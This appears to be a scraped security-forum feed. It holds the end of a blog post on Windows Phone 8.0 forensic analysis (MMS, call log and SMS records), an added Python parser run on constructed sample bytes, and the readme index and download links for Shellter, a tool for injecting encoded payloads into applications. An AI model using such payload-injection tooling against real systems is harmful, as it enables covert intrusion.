Note 2: The potential 6 byte magic number (0xFFFFFF2A2A00) for Contact records should make it easier to find each entry. This was discovered by Sharp-eyed Cindy on the last day (by which time monkey had lost the will to live).
Note 3: The 10 digit string (in pink) could be a potential Hotmail ID.

[h=4]MMS data[/h]

Further research is required for MMS records (eg linking timestamps and phone numbers to sent files). But here's what we've learned so far ...

Various .dat files containing MMS content (eg there was a .dat file containing a sent JPEG and another .dat file containing the accompanying text) are stored in:
\SharedData\Comms\Unistore\data
under 3 sub-directories: "0", "2" and "7". These folders might correspond to Sent, Received and Draft??? There were multiple .dat files with similar names each seemingly containing info for different parts of the same MMS.

In "store.vol", there are records containing the UTF-16-LE encoded string for "MMS". These records also contain 3 filename strings and a filetype string (possibly the MIME type eg "image/jpeg"). From my jet-lagged memory, I want to say that the filename strings were pointing to the same filename and there were multiple "MMS" entries for a single MMS message (ie each MMS message has three separate files associated with it). But you should probably check it out for yourself ...

[Figure: MMS record (from "store.vol")]

[h=4]Call log[/h]

The Call log information is located in the "Phone" file. Each Call log record contains a flag (in blue) to mark whether a call record is Missed / Incoming / Outgoing. The flag values were confirmed via inspection of the phone and corresponding Call log record. There's also Start and Stop FILETIMEs, repeated contact names and repeated phone numbers. Of potential interest is a 10 digit ASCII encoded string (in grey) and what looks to be a GUID (in light purple). Each call record had the same GUID string value enclosed by "{}". Perhaps this GUID represents the phone device or the calling application??? I wonder if it would be consistent between different model phones...

[Figure: Call log record (from "Phone")]

[h=3]Summary[/h]

So there you have it - we started off knowing very little about Windows Phone 8.0 data storage and now we know a considerable amount more, especially regarding SMS records. Due to time constraints, it was not possible to investigate the non-SMS related data areas (ie MMS, Call log, Contacts) with the same level of detail. However, it's probably better to share what we've discovered now as I don't know when I'll be able to perform further research. The observations in this post may not be consistent for Windows 8.1 and/or on other models of Windows phones but hopefully this post can still serve as a starting point. As always, check that the underlying data matches your expectations!

It was really awesome having someone else to bounce ideas off when hex-diving. I'm pretty sure I would have missed some important details (eg the FILETIME timestamp) had it not been for another set of eyes. Of course, that's not always going to be possible so I also appreciated the other opportunities to work autonomously / with minimal supervision. Someday monkey might have to do this on his lonesome!

Initially, it was easy to tie my idea of success with the "I have to code a solution for every scenario/data set". It would have been awesome if I could have done that but the fact was - we didn't have any SMS messages from "store.vol" at the start and after running the one-off SMS script, we had 5000+ messages sorted in chronological order with their associated phone numbers. Success doesn't have to be black and white. It sounds cliché but focusing on little wins each day made it easier to start eating the metaphorical elephant.

Now please excuse me, while I adjust my pants ...

Posted by Cheeky4n6Monkey at 14:35
Source: Cheeky4n6Monkey - Learning About Digital Forensics: Monkeying around with Windows Phone 8.0
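As an added example (not the blog author's one-off scripts), the Python below applies the post's observations to a constructed store.vol-style byte blob: it locates the UTF-16-LE "SMStext" markers, keeps only 8-byte groupings that decode as plausible MS FILETIMEs, classifies a record as sent or received by whether phone number strings sit beside it, and recovers a sent message's destination number by matching one of its FILETIMEs against an Area 2 "SMS" record. The record layouts, the gaps between fields and the 128-byte search window are assumptions made for the sample data, not measured offsets from a real file.

```python
import re
import struct
from datetime import datetime, timedelta, timezone
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Plausibility bounds in 100 ns ticks (2000..2029): reject 8-byte groupings that cannot be timestamps
LOW, HIGH = (int((datetime(y, 1, 1, tzinfo=timezone.utc) - FILETIME_EPOCH).total_seconds()) * 10**7
             for y in (2000, 2030))
UTF16_STR = re.compile(rb"(?:[\x20-\x7e]\x00){1,80}\x00\x00")   # null-terminated UTF-16-LE text
PHONE = re.compile(r"\+?\d{4,15}")
MARKER, AREA2_MARKER = [s.encode("utf-16-le") + b"\x00\x00" for s in ("SMStext", "SMS")]

def plausible_filetimes(blob, start, end):
    """Slide an 8-byte LE window over blob[start:end]; return (ticks, datetime) for in-range values."""
    hits, off = [], max(start, 0)
    while off + 8 <= min(end, len(blob)):
        ticks = struct.unpack("<Q", blob[off:off + 8])[0]
        if LOW <= ticks < HIGH:
            hits.append((ticks, FILETIME_EPOCH + timedelta(microseconds=ticks // 10)))
        off += 8 if LOW <= ticks < HIGH else 1   # never re-read a hit shifted by one byte
    return hits

def utf16_strings(blob, start, end):
    return [m.group()[:-2].decode("utf-16-le") for m in UTF16_STR.finditer(blob, max(start, 0), end)]

def parse_sms_records(blob, window=128):
    """One dict per "SMStext" marker (Area 1); fields come from `window` bytes around it (exact gaps unknown)."""
    recs = []
    for m in re.finditer(re.escape(MARKER), blob):
        lo, hi = m.start() - window, m.end() + window
        strs = [s for s in utf16_strings(blob, lo, hi) if s != "SMStext"]
        phones = [s for s in strs if PHONE.fullmatch(s)]
        text = [s for s in strs if s not in phones]
        recs.append({"offset": m.start(), "filetimes": plausible_filetimes(blob, lo, hi),
                     "phones": phones, "text": text[0] if text else "",
                     "direction": "received" if phones else "sent"})   # post: no number => sent
    return recs

def destination_for_sent(blob, rec, window=128):
    """Phone string beside the Area 2 "SMS" record that repeats one of rec's FILETIMEs (FILETIME2), else None."""
    for ticks, _ in rec["filetimes"]:
        raw, pos = struct.pack("<Q", ticks), -1
        while (pos := blob.find(raw, pos + 1)) != -1:
            lo, hi = pos - window, pos + 8 + window
            if abs(pos - rec["offset"]) <= window or blob.find(AREA2_MARKER, max(lo, 0), hi) == -1:
                continue   # this record's own copy of the value, or no "SMS" marker nearby
            phones = [s for s in utf16_strings(blob, lo, hi) if PHONE.fullmatch(s)]
            if phones:
                return phones[0]
    return None

def build_sample_blob():
    """Constructed bytes laid out as the post describes; not taken from a real store.vol."""
    u = lambda s: s.encode("utf-16-le") + b"\x00\x00"
    ft1 = bytes.fromhex("FF03D2315FE1C701")                   # the post's example value
    ft2, ftr = (struct.pack("<Q", struct.unpack("<Q", ft1)[0] + n * 10**7) for n in (3, 45))
    sent = ft1 + ft2 + MARKER + ft1 + ft1 + u("Look! A Squirrel!")   # sent: no phone number
    recv = ftr * 2 + MARKER + ftr * 2 + u("Ha, where?") + u("+16085551234") * 3
    area2 = ft2 + b"\x00" * 4 + AREA2_MARKER + b"\x00" * 4 + u("+16085559876")
    return b"\x00" * 32 + sent + b"\xcc" * 160 + recv + b"\xcc" * 160 + area2 + b"\x00" * 16
```

On the sample blob the first record decodes to the post's 18 August 2007 06:15:37 UTC value with no phone strings (sent), the second carries three identical source numbers (received), and the Area 2 match yields the sent message's destination number.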
  24. Shellter v1.0

Index
=======
[1] What is it?
[2] How does it work?
[3] What does it trace?
[4] Why do I need Shellter?
[5] What types of apps can I use?
[6] Can I use encoded/self-decrypting payloads?
[7] What about self-modifying code?
[8] What about relocations?
[9] What about Multi-Thread Applications?
[10] What about Anti-Reversing tricks?
[11] What if the target process dies during tracing?
[12] What if an internal engine related error occurs?
[13] How do execution flow filters work?
[14] How much time does it need for tracing and log filtering?
[15] What options does Shellter provide?
[16] System Requirements
[17] What should I do if I want to send feedback?
[18] What should I do if I want to report a bug?
[19] What should I do if I don't like it?

Readme: https://www.shellterproject.com/Downloads/Shellter/Readme.txt

Source: https://www.shellterproject.com/download/
  25. [h=1]OHM2013: RAM Memory acquisition using live-BIOS modification[/h]